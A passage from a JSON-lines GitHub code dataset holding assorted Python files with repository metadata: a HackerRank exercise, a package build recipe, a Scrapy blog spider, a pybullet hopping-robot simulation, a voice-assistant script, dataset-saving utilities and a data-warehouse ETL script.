semantic_manifest\n","repo_name":"dbt-labs/dbt-semantic-interfaces","sub_path":"dbt_semantic_interfaces/transformations/add_input_metric_measures.py","file_name":"add_input_metric_measures.py","file_ext":"py","file_size_in_byte":2797,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"38"}
+{"seq_id":"37527994613","text":"\"\"\"\nTask\nGiven n names and phone numbers, assemble a phone book that maps friends' names to their respective\nphone numbers. You will then be given an unknown number of names to query your phone book for. \nFor each name queried, print the associated entry from your phone book on a new line in the form \nname=phoneNumber; if an entry for name is not found, print Not found instead.\n\nNote: Your phone book should be a Dictionary/Map/HashMap data structure.\n\"\"\"\n\nn = int(input())\nphoneBook = {}\n\n# Fill a phonebook\nfor i in range(0, n):\n entry = str(input()).split(\" \")\n name = entry[0]\n number = entry[1] \n phoneBook[name] = number\n \n# Use while loop because don't know how many name entries will be\nwhile True:\n try:\n name = input()\n except:\n break\n if name in phoneBook:\n number = phoneBook[name]\n print(name + \"=\" + number)\n else:\n print(\"Not found\")","repo_name":"irsol/hacker-rank-30-days-of-code","sub_path":"Day 8: Dictionaries and Maps.py","file_name":"Day 8: Dictionaries and Maps.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"3887392463","text":"metadata = \"\"\"\nsummary @ Creates PKZIP-compatible .zip files\nhomepage @ http://www.info-zip.org/pub/infozip/Zip.html\nlicense @ Info-ZIP\nsrc_url @ ftp://ftp.info-zip.org/pub/infozip/src/$name30.zip\narch @ ~x86_64\n\"\"\"\n\nstandard_procedure = False\n\nsrcdir = \"zip30\"\n\ndef build():\n make(\"-f unix/Makefile LOCAL_ZIP='%s' prefix=/usr generic_gcc\" % get_env(\"CFLAGS\"))\n\ndef install():\n raw_install(\"-f unix/Makefile INSTALL=/bin/install prefix=%s/usr \\\n MANDIR=%s/usr/share/man/man1\" % (install_dir, install_dir))\n\n insdoc(\"LICENSE\")\n","repo_name":"wdysln/new","sub_path":"app-arch/zip/zip-3.0.py","file_name":"zip-3.0.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"}
+{"seq_id":"4588339274","text":"from impulse.root import root_mtg\nfrom openalea.plantgl.all import Viewer\n\ng = root_mtg.mtg_root()\n\ns = root_mtg.Simulate(g)\n\nfor i in range(100):\n s.step()\n scene = root_mtg.plot(g)\n Viewer.display(scene)\n\n\n","repo_name":"openalea-incubator/impulse","sub_path":"src/impulse/root/test_root.py","file_name":"test_root.py","file_ext":"py","file_size_in_byte":217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"74098695471","text":"# -*- coding: utf-8 -*-\n\nfrom scrapy.linkextractors import LinkExtractor\nfrom scrapy.spiders import CrawlSpider, Rule\n\nfrom blogArticle.items import BlogArticleItem\n\n\nclass ArticleSpiderSpider(CrawlSpider):\n name = 'article_spider'\n allowed_domains = ['jianshu.com']\n start_urls = ['https://www.jianshu.com/p/61b9ef649461']\n\n rules = (\n Rule(LinkExtractor(allow=r'.*/p/[0-9a-z]{12}.*'), callback='parse_item', follow=True),\n )\n\n def parse_item(self, response):\n # 文章的标题 a_title\n title = response.xpath(\"//h1[@class='_1RuRku']/text()\").get()\n\n # 文章分类 对应item里面a_category\n category = 'Python'\n\n # 文章的发布时间 对应item里面的a_release_time ajax请求的数据,,\n release_time = response.xpath(\"//div[@class='s-dsoj']/time/text()\").get().replace(\".\", '-')\n\n # 文章的观看人数 对应item里面的a_watch_number ajax请求的数据\n read_number = response.xpath(\"//div[@class='s-dsoj']/span[last()]/text()\").get()\n read_number = int(read_number.split(\" \")[1].replace(\",\", '')) # 阅读 5,648 --> 5648 转成int\n\n # 文章的类容 对应item里面的a_content ajax请求的数据,\n content = \"\".join(response.xpath(\"//article[@class='_2rhmJa']\").getall())\n\n # 源地址 对应item里面的 a_origin\n origin = response.url.split(\"?\")[0]\n\n # 文章的简介 对应item里面a_introduce\n introduce = response.xpath(\"//article[@class='_2rhmJa']/blockquote/p/text()\").get()\n if not introduce:\n # 为空默认从文章中摘取一段\n introduce = response.xpath(\"//article[@class='_2rhmJa']/p[5]/text()\").get()\n\n # 文章简介图片 对应item里面a_introduce_img\n introduce_img = response.xpath(\"//article[@class='_2rhmJa']//img/@data-original-src\").get()\n\n item = BlogArticleItem(\n a_title=title,\n a_category=category,\n a_release_time=release_time,\n a_read_number=read_number,\n a_content=content,\n a_origin=origin,\n a_introduce=introduce,\n a_introduce_img=introduce_img,\n )\n\n yield item\n","repo_name":"Qunoal/blog-crawler","sub_path":"blogArticle/spiders/article_spider.py","file_name":"article_spider.py","file_ext":"py","file_size_in_byte":2219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"26343926878","text":"import pybullet as p\nimport time\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# physicsClient = p.connect(p.GUI)#or p.DIRECT for non-graphical version\n\n# p.setAdditionalSearchPath(pybullet_data.getDataPath()) #this will load the plane urdf \np.connect(p.GUI)\np.configureDebugVisualizer(p.COV_ENABLE_GUI,0)\np.configureDebugVisualizer(p.COV_ENABLE_RGB_BUFFER_PREVIEW,0)\np.createCollisionShape(p.GEOM_PLANE)\nplId=p.createMultiBody(0,0)\np.resetDebugVisualizerCamera( cameraDistance=4, cameraYaw=10, cameraPitch=-20, \n cameraTargetPosition=[0.0, 0.0, 0.25])\np.setGravity(0,0,-10) #along the Z axis\n\n# planeId = p.loadURDF(\"plane.urdf\")\n\n#---loading the bodyId----:\nfootIdos = [0,0,1] # it will be spawned at z=1\nstartOrientation = p.getQuaternionFromEuler([0,0,0]) #angle at which it will be spawned\n\n\n#creating the robot:\nsh_colFoot = p.createCollisionShape(p.GEOM_BOX,halfExtents=[0.01,0.01,0.1])\nsh_colBody = p.createCollisionShape(p.GEOM_BOX,halfExtents=[0.2,0.2,0.1])\nsh_colBody = p.createCollisionShape(p.GEOM_CYLINDER,radius=0.13, height=0.6)\nsh_visBody = p.createVisualShape(p.GEOM_CYLINDER,radius=0.13, length=0.6, rgbaColor=[0.4,0.4,0.5,1])\nsh_colPx = p.createCollisionShape(p.GEOM_BOX,halfExtents=[0.01,0.1,0.1])\nsh_colPy = p.createCollisionShape(p.GEOM_BOX,halfExtents=[0.1,0.01,0.1])\n\nbodyId=p.createMultiBody(baseMass=1,baseCollisionShapeIndex = sh_colBody, baseVisualShapeIndex = sh_visBody,\n basePosition = [0,0,1.5],baseOrientation=[0,0,0,1])\nfootId=p.createMultiBody(baseMass=1,baseCollisionShapeIndex = sh_colFoot,\n basePosition = [0,0,0.5],baseOrientation=[0,0,0,1])\n\n# base = p.createCollisionShape(p.GEOM_BOX,halfExtents=[0.1,0.1,0.1])\n# sh_colFoot = p.createCollisionShape(p.GEOM_BOX,halfExtents=[0.01,0.01,0.1])\n# sh_colPx = p.createCollisionShape(p.GEOM_BOX,halfExtents=[0.01,0.1,0.1])\n# sh_colPy = p.createCollisionShape(p.GEOM_BOX,halfExtents=[0.1,0.01,0.1])\n# sh_colBody = p.createCollisionShape(p.GEOM_BOX,halfExtents=[0.2,0.2,0.1])\n# Body_1 = p.createCollisionShape(p.GEOM_CYLINDER,radius=0.13, height=0.6)\n# sh_visBody = p.createVisualShape(p.GEOM_CYLINDER,radius=0.13, length=0.6, rgbaColor=[0.4,0.4,0.5,1])\n\n\n# bodyId=p.crefootIdtiBody(baseMass=1,baseCollisionShapeIndex = Body_1,baseVisualShapeIndex = sh_visBody,\n# basePosition = [0,0,1.5],baseOrientation=[0,0,0,1])\n\n# footID=p.createMultiBody(baseMass = 1,baseCollisionShapeIndex = sh_colFoot, \n# basePosition = [0,0,0.5],baseOrientation=startOrientation)\n\n# #----------------------INERTIA INCREASING PLATES-----------------------\n# cubeId3=p.createMultiBody(baseMass = 3,baseCollisionShapeIndex = sh_colPx,\n# basePosition = [-0.5,0,1.5],baseOrientation=[0,0,0,1])\n# cubeId4=p.createMultiBody(baseMass = 3,baseCollisionShapeIndex = sh_colPx,\n# basePosition = [0.5,0,1.5],baseOrientation=[0,0,0,1])\n# cubeId5=p.createMultiBody(baseMass = 3,baseCollisionShapeIndex = sh_colPy,\n# basePosition = [0,-0.5,1.5],baseOrientation=[0,0,0,1])\n# cubeId6=p.createMultiBody(baseMass = 3,baseCollisionShapeIndex = sh_colPy,\n# basePosition = [0,0.5,1.5],baseOrientation=[0,0,0,1])\ncubeId3=p.createMultiBody(baseMass=3,baseCollisionShapeIndex = sh_colPx,\n basePosition = [-0.5,0,1.5],baseOrientation=[0,0,0,1])\ncubeId4=p.createMultiBody(baseMass=3,baseCollisionShapeIndex = sh_colPx,\n basePosition = [0.5,0,1.5],baseOrientation=[0,0,0,1])\ncubeId5=p.createMultiBody(baseMass=3,baseCollisionShapeIndex = sh_colPy,\n basePosition = 
[0,-0.5,1.5],baseOrientation=[0,0,0,1])\ncubeId6=p.createMultiBody(baseMass=3,baseCollisionShapeIndex = sh_colPy,\n basePosition = [0,0.5,1.5],baseOrientation=[0,0,0,1])\n\n#Scenery e.g. an inclined box\nboxHalfLength = 2.5\nboxHalfWidth = 2.5\nboxHalfHeight = 0.2\nsh_colBox = p.createCollisionShape(p.GEOM_BOX,halfExtents=[boxHalfLength,boxHalfWidth,boxHalfHeight])\nsh_visBox = p.createVisualShape(p.GEOM_BOX,halfExtents=[boxHalfLength,boxHalfWidth,boxHalfHeight], rgbaColor=[0,0,0,1])\n\nblock=p.createMultiBody(baseMass=0,baseCollisionShapeIndex = sh_colBox,\n basePosition = [-2,0,-0.1],baseOrientation=[0.0,0.1,0.0,1])\nsth=0.15\nblock2=p.createMultiBody(baseMass=0,baseCollisionShapeIndex = sh_colBox, baseVisualShapeIndex = sh_visBox,\n basePosition = [5.75,0.15,-0.2+1*sth],baseOrientation=[0.0,0.0,0.0,1])\nblock3=p.createMultiBody(baseMass=0,baseCollisionShapeIndex = sh_colBox,\n basePosition = [5.75+0.33,0,-0.2+2*sth],baseOrientation=[0.0,0.0,0.0,1])\nblock4=p.createMultiBody(baseMass=0,baseCollisionShapeIndex = sh_colBox,\n basePosition = [5.75+0.66,0.2,-0.2+3*sth],baseOrientation=[0.1,0.0,0.0,1])\nblock5=p.createMultiBody(baseMass=0,baseCollisionShapeIndex = sh_colBox,\n basePosition = [5.75+0.99,0.1,-0.2+4*sth],baseOrientation=[0.0,-0.1,0.0,1])\n\nbox11l=0.5\nbox11w=0.5\nbox11h=0.1\nsh_box11 = p.createCollisionShape(p.GEOM_BOX,halfExtents=[box11l,box11w,box11h])\nsth=0.15\nfor k in range(10):\n p.createMultiBody(baseMass=0,baseCollisionShapeIndex = sh_box11,\n basePosition = [3+0.4*k,-1+k/200,k*sth],baseOrientation=[0.0,0.0,0.0,1])\np.createMultiBody(baseMass=0,baseCollisionShapeIndex = sh_box11,\n basePosition = [3+0.4*10,-1,k*sth+0.01],baseOrientation=[0.0,0.0,0.0,1])\nfor k in range(10):\n p.createMultiBody(baseMass=0,baseCollisionShapeIndex = sh_box11,\n basePosition = [3+0.4*10+k/200,-0.5+0.4*k,(k+10)*sth],baseOrientation=[0.0,0.0,0.0,1])\nbox14_1l=7\nbox14_1w=0.75\nbox11h=0.1\nsh_box14_1 = p.createCollisionShape(p.GEOM_BOX,halfExtents=[box14_1l,box14_1w,box11h])\nbox14_1=p.createMultiBody(baseMass=0,baseCollisionShapeIndex = sh_box14_1,\n basePosition = [-0.3,3.1,1.4],baseOrientation=[0.0,-0.1,0.0,1])\n\n\n\np.setGravity(0,0,-10)\np.setRealTimeSimulation(1)\n#make the plane less slippery\np.changeDynamics(plId,-1,lateralFriction=10)\np.changeDynamics(block5,-1,lateralFriction=10)\np.changeDynamics(box14_1,-1,lateralFriction=10)\n\n#connections:\ncid_0= p.createConstraint(bodyId, -1 ,footId, -1 , p.JOINT_FIXED, jointAxis=[0,0,0],parentFramePosition=[0,0,0], childFramePosition=[0,0,1])\ncid4 = p.createConstraint(bodyId,-1,cubeId3,-1,p.JOINT_FIXED,[0,0,0],[0,0,0],[0.25,0,0])\ncid5 = p.createConstraint(bodyId,-1,cubeId4,-1,p.JOINT_FIXED,[0,0,0],[0,0,0],[-0.25,0,0])\ncid6 = p.createConstraint(bodyId,-1,cubeId5,-1,p.JOINT_FIXED,[0,0,0],[0,0,0],[0,0.25,0])\ncid7 = p.createConstraint(bodyId,-1,cubeId6,-1,p.JOINT_FIXED,[0,0,0],[0,0,0],[0,-0.25,0])\n\n\n# #simple simulation to start:\n# p.setTimeStep(0.001)\n# p.setRealTimeSimulation(1)\n\n\n#initiate:\npivot=[0,0,0,1]\ndecomprPhase=0\n\nJoints=p.getNumJoints(bodyId)\ncubePos, cubeOrn = p.getBasePositionAndOrientation(bodyId)\nDes= cubeOrn\nEuler=p.getEulerFromQuaternion(cubeOrn)\n\nt=0\ntstr=0\nvx=0\nvy=0\nzgnd=0\njmp=0\nxgl=7\nygl=-1\n\n\ndestination=[]\nx_vel=[]\ny_vel=[]\nz_vel=[]\nz_pos=[]\nx_pos=[]\ny_pos=[]\n\n# while 1:\nfor i in range(1000):\n p.resetDebugVisualizerCamera( cameraDistance=6, cameraYaw=-130+t/10, cameraPitch=-60, \n cameraTargetPosition=[cubePos[0], cubePos[1], 0.25])\n t+=1 \n time.sleep(0.01)\n\n keys = 
p.getKeyboardEvents()\n if keys.get(65297): #Up\n vx+=0.002\n if keys.get(65298): #Down\n vx-=0.002\n if keys.get(65296): #Right\n vy-=0.002\n if keys.get(65295): #Left\n vy+=0.002\n if keys.get(97): #A\n if jmp==0: \n vx*=3\n vy*=3\n jmp=1\n \n if cubePos[0]3:\n xgl=-8\n if xgl==-8 and cubePos[0]<6.5:\n vy=-0.04\n \n #computing positions velocities, orientation angles, etc\n cube_prev=cubePos\n Euler_prev=Euler\n cubePos, cubeOrn = p.getBasePositionAndOrientation(bodyId)\n vel_x_cube_pos=(cubePos[0]-cube_prev[0])/0.01\n vel_y_cube_pos=(cubePos[1]-cube_prev[1])/0.01\n vel_z_cube_pos=(cubePos[2]-cube_prev[2])/0.01\n x_vel.append(vel_x_cube_pos)\n y_vel.append(vel_y_cube_pos)\n z_vel.append(vel_z_cube_pos)\n z_pos.append(cubePos[2])\n x_pos.append(cubePos[0])\n y_pos.append(cubePos[1])\n\n Euler=p.getEulerFromQuaternion(cubeOrn)\n omega_x=(Euler[0]-Euler_prev[0])/0.01\n omega_y=(Euler[1]-Euler_prev[1])/0.01\n\n x_foot, dum=p.getBasePositionAndOrientation(footId)\n if (vel_z_cube_pos>0 and decomprPhase==0):\n decomprPhase=1\n tstr=t \n zgnd=x_foot[2]+0.05\n\n if (x_foot[2]-zgnd>0.105 and decomprPhase==1):\n decomprPhase=2\n if jmp==1:\n vx=vx/3\n vy=vy/3\n jmp=0\n \n if x_foot[2]-zgnd<0.105 and decomprPhase==2:\n decomprPhase=0\n\n if decomprPhase==1:\n #decompressing: PD control on orientation of body during stance\n DesEU=p.getEulerFromQuaternion(Des)\n Des = p.getQuaternionFromEuler(DesEU + np.array([-0.07*omega_x-0.3*Euler[0] -0.15*(-(vel_y_cube_pos-vy)*np.cos(Euler[2])+(vel_x_cube_pos-vx)*np.sin(Euler[2])),\n -0.07*omega_y-0.3*Euler[1] -0.15*( (vel_x_cube_pos-vx)*np.cos(Euler[2])+(vel_y_cube_pos-vy)*np.sin(Euler[2])),0.0]))\n if ((t-tstr)<8 and jmp==1): #trust for a small time interval (increased spring force)\n p.changeConstraint(cid_0,pivot,jointChildFrameOrientation=Des, maxForce=1300)\n elif ((t-tstr)<8):\n p.changeConstraint(cid_0,pivot,jointChildFrameOrientation=Des, maxForce=600)\n else:\n p.changeConstraint(cid_0,pivot,jointChildFrameOrientation=Des, maxForce=300)\n else:\n #flight and compression: Reposition foot for next landing based on body horizontal velocity and orientation\n if (x_foot[2]-zgnd>0.105):\n Des = p.getQuaternionFromEuler(\n [+0.15*(-(vel_y_cube_pos-0.0)*np.cos(Euler[2])+(vel_x_cube_pos-0.0)*np.sin(Euler[2])) + Euler[0],\n +0.15*( (vel_x_cube_pos-0.0)*np.cos(Euler[2])+(vel_y_cube_pos-0.0)*np.sin(Euler[2])) + Euler[1], 0.0])\n \n p.changeConstraint(cid_0,pivot,jointChildFrameOrientation=Des, maxForce=300)\n destination.append(Des)\n\np.disconnect()\n\n\nxrot=[]\nyrot=[]\nzrot=[]\nfor i in range(len(destination)):\n print(p.getEulerFromQuaternion(destination[i]))\n xrot.append(destination[i][0])\n yrot.append(destination[i][1])\n zrot.append(destination[i][2])\n\nfig,axs=plt.subplots(7)\naxs[0].plot(xrot)\naxs[1].plot(yrot)\naxs[2].plot(zrot)\naxs[3].plot(x_vel)\naxs[4].plot(y_vel)\naxs[5].plot(z_vel)\naxs[6].plot(z_pos)\n\naxs[0].set_title(\"X rot Euler\")\naxs[1].set_title(\"y rot Euler\")\naxs[2].set_title(\"z rot Euler\")\naxs[3].set_title(\"X vel\")\naxs[4].set_title(\"y vel\")\naxs[5].set_title(\"z vel\")\naxs[6].set_title(\"z pos\")\n\n\n# plt.plot(destination)\nplt.show()\n\n","repo_name":"anushtup-nandy/Hopper_robot","sub_path":"Jumping_robot_sim.py","file_name":"Jumping_robot_sim.py","file_ext":"py","file_size_in_byte":11230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
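The stance branch in the record above applies PD feedback on body orientation (terms of the form -0.07*omega - 0.3*angle). A generic standalone sketch of that structure; the function name is illustrative and the default gains simply mirror the record:

def pd_correction(error, rate, kp=0.3, kd=0.07):
    # PD feedback: oppose both the current error and its rate of change
    return -kd * rate - kp * error

print(pd_correction(error=0.1, rate=0.5))  # -0.065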
+{"seq_id":"9771950446","text":"from ZODB import FileStorage,DB\nimport transaction\nfrom modelo import Compania\nstorage = FileStorage.FileStorage('zodb/meubd.fs')\nbanco=DB(storage)\nconnection=banco.open()\nroot=connection.root()\n\n# percorrer as pessoas\nfor pe in root['empresas']:\n print(pe)\n\nconnection.close()","repo_name":"NaTTaNMendes/POO2","sub_path":"E9/OLHARDADOSZODB.PY","file_name":"OLHARDADOSZODB.PY","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"25805445277","text":"from pip import main\r\nimport pyttsx3\r\nimport datetime\r\nimport speech_recognition as sr\r\nimport wikipedia\r\nimport webbrowser\r\nimport os\r\n\r\n\r\nengine=pyttsx3.init('sapi5')\r\nvoices=engine.getProperty('voices')\r\n# print(voices[1].id)\r\nengine.setProperty('voice',voices[1].id)\r\n\r\n\r\n#SPEAK FUNCTION\r\n# ---------------------------------------------------------------------------------------------------------\r\ndef speak(audio):\r\n engine.say(audio)\r\n engine.runAndWait()\r\n\r\n#WISH ME FUNCTION\r\n# ----------------------------------------------------------------------------------------------------------\r\ndef wishMe():\r\n hour = int(datetime.datetime.now().hour)\r\n if hour>=0 and hour<12:\r\n speak(\"Good Morning!\")\r\n\r\n elif hour>=12 and hour<18:\r\n speak(\"Good Afternoon!\") \r\n\r\n else:\r\n speak(\"Good Evening!\") \r\n\r\n speak(\"I am Jarvis Sir. Please tell me how may I help you\") \r\n\r\n\r\n#TAKE COMMAND FUNCTION\r\n# ------------------------------------------------------------------------------------------------------\r\ndef takecommand():\r\n #takes microphone input from user and return string output\r\n r = sr.Recognizer()\r\n with sr.Microphone() as source:\r\n print(\"Listening...\")\r\n r.pause_threshold = 1 \r\n #seconds of non speaking audio before a phrase is considered complete\r\n audio = r.listen(source)\r\n try:\r\n print(\"Recognizing...\") \r\n query = r.recognize_google(audio, language='en-in')\r\n print(f\"User said: {query}\\n\")\r\n\r\n except Exception as e:\r\n # print(e) \r\n print(\"Say that again please...\") \r\n return \"None\"\r\n return query \r\n\r\n\r\n #email function\r\n #----------------------------------------------------------------------------------------------------------\r\n def sendEmail(to, content):\r\n server = smtplib.SMTP('smtp.gmail.com', 587)\r\n server.ehlo()\r\n server.starttls()\r\n server.login('youremail@gmail.com', 'your-password')\r\n server.sendmail('youremail@gmail.com', to, content)\r\n server.close()\r\n\r\n\r\n#MAIN FUNCTION\r\n#--------------------------------------------------------------------------------------------------------------\r\n\r\nif __name__== \"__main__\":\r\n # speak(\"shalini is good girl\")\r\n wishMe()\r\n\r\n while(True):\r\n query=takecommand().lower()\r\n #Logic for executing tasks based on query\r\n\r\n#--------------------------------------------------------------------------------------------------------------\r\n if 'wikipedia' in query:\r\n speak('Searching Wikipedia...')\r\n query = query.replace(\"wikipedia\", \"\")\r\n results = wikipedia.summary(query, sentences=5)\r\n #jarvis read 5 sentences \r\n speak(\"According to Wikipedia....................\")\r\n print(results)\r\n speak(results)\r\n\r\n elif 'open youtube' in query:\r\n webbrowser.open(\"youtube.com\")\r\n\r\n elif 'open google' in query:\r\n webbrowser.open(\"google.com\")\r\n\r\n elif 'open stackoverflow' in query:\r\n webbrowser.open(\"stackoverflow.com\") \r\n \r\n elif 'open HackerRank' in query:\r\n webbrowser.open(\"hackerrank.com\") \r\n \r\n elif 'play music' in query:\r\n music_dir = 'G:\\\\Favouritesongs'\r\n #path of music folder\r\n songs = os.listdir(music_dir)\r\n # print(songs) \r\n os.startfile(os.path.join(music_dir, songs[0]))\r\n #it will play 1st song of your playlist if u want to play random then we have to use random module\r\n\r\n elif 'the time' in query:\r\n strTime = datetime.datetime.now().strftime(\"%H:%M:%S\") \r\n speak(f\"Sir, the 
time is {strTime}\")\r\n\r\n \r\n elif 'open code' in query:\r\n codePath = \"C:\\\\Users\\\\HP\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe\"\r\n os.startfile(codePath)\r\n #opening the file\r\n\r\n elif 'email to harry' in query:\r\n try:\r\n speak(\"What should I say?\")\r\n content = takeCommand()\r\n to = \"harryyourEmail@gmail.com\" \r\n sendEmail(to, content)\r\n speak(\"Email has been sent!\")\r\n except Exception as e:\r\n print(e)\r\n speak(\"Sorry my friend harry bhai. I am not able to send this email\") \r\n #this email only work when we change our security to less secure app \r\n\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n\r\n\r\n\r\n \r\n \r\n\r\n","repo_name":"shalini0517/Jarvis-AI-desktop","sub_path":"jarvis.py","file_name":"jarvis.py","file_ext":"py","file_size_in_byte":4560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"10048269935","text":"\"\"\" \n:author: Tal Peretz\n:date: 11/11/2016\n:TL;DR: this module purpose is generating datasets for pyds tests\n\"\"\"\n\nimport os\n\nimport pandas as pd\nimport sklearn.datasets\n\nsave_attribute_to_file_extension = {'to_excel': 'xls', 'to_html': 'html', 'to_json': 'json', 'to_pickle': 'pickle',\n 'to_stata': 'stata', 'to_sql': 'sql', 'to_csv': 'csv', }\nDATASETS_PATH = os.path.abspath(\"\")\n\ndatasets = (\n sklearn.datasets.load_boston(),\n sklearn.datasets.fetch_california_housing())\n\n\ndef save_datasets(datasets_collection):\n for i, dataset in enumerate(datasets_collection):\n dataset_name = dataset['DESCR'].split('\\n')[0]\n # build path variable, check if exists, if not create it\n path = DATASETS_PATH + '/' + dataset_name + '/'\n file_name = 'train.%s' % tuple(save_attribute_to_file_extension.values())[i]\n if not os.path.exists(path):\n os.makedirs(path)\n\n # build the dataframe in the form of data columns and target variable in one DataFrame\n df = pd.concat([pd.DataFrame(data=dataset['data'], columns=dataset['feature_names']),\n pd.Series(data=dataset['target'], name='target')], axis=1)\n\n # save the resulting DataFrame in a format from save_attribute_to_file_extension\n getattr(df, tuple(save_attribute_to_file_extension.keys())[i])(path + file_name)\n\n\nif __name__ == '__main__':\n save_datasets(datasets)\n","repo_name":"talperetz/pyds","sub_path":"tests/resources/datasets/save_datasets.py","file_name":"save_datasets.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"38"}
+{"seq_id":"10449781960","text":"import re\n\nimport pandas as pd\nfrom sqlalchemy import create_engine\n\n\ndef remove_special_chars(x):\n return re.sub(r\"[^a-zA-Z0-9]+\", ' ', x)\n\n\ndef transform_str(value):\n if type(value) is not str:\n return None\n new = remove_special_chars(value)\n return new.upper()\n\n\ndef ingest_dim_local(source_engine, dw_engine):\n source_connection = source_engine.connect()\n table_name = \"dim_local\"\n\n results = source_connection.execute(\"\"\"\n (SELECT\n customer_zip_code_prefix as zip_code_prefix,\n customer_city as city,\n customer_state as state\n FROM customer)\n UNION\n (SELECT\n seller_zip_code_prefix as zip_code_prefix,\n seller_city as city,\n seller_state as state\n FROM seller);\n\n \"\"\")\n data = pd.DataFrame(results.fetchall())\n data.columns = results.keys()\n\n data.drop_duplicates(subset=['zip_code_prefix'], keep='first', inplace=True)\n data[\"city\"] = data[\"city\"].map(transform_str)\n data[\"state\"] = data[\"state\"].map(transform_str)\n\n data.to_sql(name=table_name, con=dw_engine, if_exists='append', index=False)\n\n\ndef ingest_dim_product(source_engine, dw_engine):\n source_connection = source_engine.connect()\n table_name = \"dim_product\"\n\n results = source_connection.execute(\"\"\"\n SELECT\n product.product_id as original_id,\n product.product_category_name as category_name\n FROM product;\n \"\"\")\n data = pd.DataFrame(results.fetchall())\n data.columns = results.keys()\n\n data[\"category_name\"] = data[\"category_name\"].map(transform_str)\n\n data.to_sql(name=table_name, con=dw_engine, if_exists='append', index=False)\n\n\ndef ingest_dim_order_payment_and_dim_payment(source_engine, dw_engine):\n source_connection = source_engine.connect()\n\n results = source_connection.execute(\"\"\"\n SELECT\n order_id as order_id,\n payment_sequential as sequential,\n payment_type as type,\n payment_installments as installments,\n payment_value as value\n FROM order_payment;\n \"\"\")\n data = pd.DataFrame(results.fetchall())\n data.columns = results.keys()\n\n order_payment = data[['order_id']].copy()\n order_payment.drop_duplicates(subset=['order_id'], keep='first', inplace=True)\n order_payment.to_sql(name=\"dim_order_payment\", con=dw_engine, if_exists='append', index=False)\n order_payment = pd.read_sql_table(\"dim_order_payment\", con=dw_engine)\n\n data = pd.merge(data, order_payment, on='order_id')\n data.rename({'id': 'order_payment_id'}, axis=1, inplace=True)\n payment = data[['order_payment_id', 'sequential', 'type', 'installments', 'value']].copy()\n payment.to_sql(name=\"dim_payment\", con=dw_engine, if_exists='append', index=False)\n\n\ndef ingest_dim_seller(source_engine, dw_engine):\n source_connection = source_engine.connect()\n table_name = \"dim_seller\"\n\n results = source_connection.execute(\"\"\"\n SELECT \n seller_id as original_id,\n seller_zip_code_prefix as zip_code_prefix\n FROM seller;\n \"\"\")\n seller = pd.DataFrame(results.fetchall())\n seller.columns = results.keys()\n\n dim_local = pd.read_sql_table(\"dim_local\", con=dw_engine)\n\n data = pd.merge(seller, dim_local, on='zip_code_prefix')\n data.rename({'id': 'local_id'}, axis=1, inplace=True)\n dim_seller = data[['original_id', 'local_id']].copy()\n dim_seller.to_sql(name=table_name, con=dw_engine, if_exists='append', index=False)\n\n\ndef ingest_dim_customer(source_engine, dw_engine):\n source_connection = source_engine.connect()\n table_name = \"dim_customer\"\n\n results = source_connection.execute(\"\"\"\n SELECT \n customer_id as 
original_id,\n customer_unique_id as unique_id,\n customer_zip_code_prefix as zip_code_prefix\n FROM customer;\n \"\"\")\n customer = pd.DataFrame(results.fetchall())\n customer.columns = results.keys()\n\n dim_local = pd.read_sql_table(\"dim_local\", con=dw_engine)\n\n data = pd.merge(customer, dim_local, on='zip_code_prefix')\n data.rename({'id': 'local_id'}, axis=1, inplace=True)\n dim_seller = data[['original_id', 'local_id', 'unique_id']].copy()\n dim_seller.to_sql(name=table_name, con=dw_engine, if_exists='append', index=False)\n\n\ndef ingest_dim_date(source_engine, dw_engine):\n source_connection = source_engine.connect()\n table_name = \"dim_date\"\n\n results = source_connection.execute(\"\"\"\n (SELECT \n DAY(order_purchase_timestamp) as day,\n MONTH(order_purchase_timestamp) as month,\n YEAR(order_purchase_timestamp) as year,\n DATE_FORMAT(order_purchase_timestamp, \"%%Y/%%m/%%d\") as str\n FROM orders WHERE order_purchase_timestamp IS NOT NULL)\n UNION\n (SELECT \n DAY(order_approved_at) as day,\n MONTH(order_approved_at) as month,\n YEAR(order_approved_at) as year,\n DATE_FORMAT(order_approved_at, \"%%Y/%%m/%%d\") as str\n FROM orders WHERE order_approved_at IS NOT NULL)\n UNION\n (SELECT \n DAY(order_delivered_carrier_date) as day,\n MONTH(order_delivered_carrier_date) as month,\n YEAR(order_delivered_carrier_date) as year,\n DATE_FORMAT(order_delivered_carrier_date, \"%%Y/%%m/%%d\") as str\n FROM orders WHERE order_delivered_carrier_date IS NOT NULL)\n UNION\n (SELECT \n DAY(order_delivered_customer_date) as day,\n MONTH(order_delivered_customer_date) as month,\n YEAR(order_delivered_customer_date) as year,\n DATE_FORMAT(order_delivered_customer_date, \"%%Y/%%m/%%d\") as str\n FROM orders WHERE order_delivered_customer_date IS NOT NULL)\n UNION\n (SELECT \n DAY(order_estimated_delivery_date) as day,\n MONTH(order_estimated_delivery_date) as month,\n YEAR(order_estimated_delivery_date) as year,\n DATE_FORMAT(order_estimated_delivery_date, \"%%Y/%%m/%%d\") as str\n FROM orders WHERE order_estimated_delivery_date IS NOT NULL);\n \"\"\")\n data = pd.DataFrame(results.fetchall())\n data.columns = results.keys()\n\n data.drop_duplicates(subset=['str'], keep='first', inplace=True)\n data.to_sql(name=table_name, con=dw_engine, if_exists='append', index=False)\n\n\ndef ingest_dims():\n source_engine = create_engine(\"mysql+pymysql://root:12345@localhost:3307/sourceDB\", echo=False)\n dw_engine = 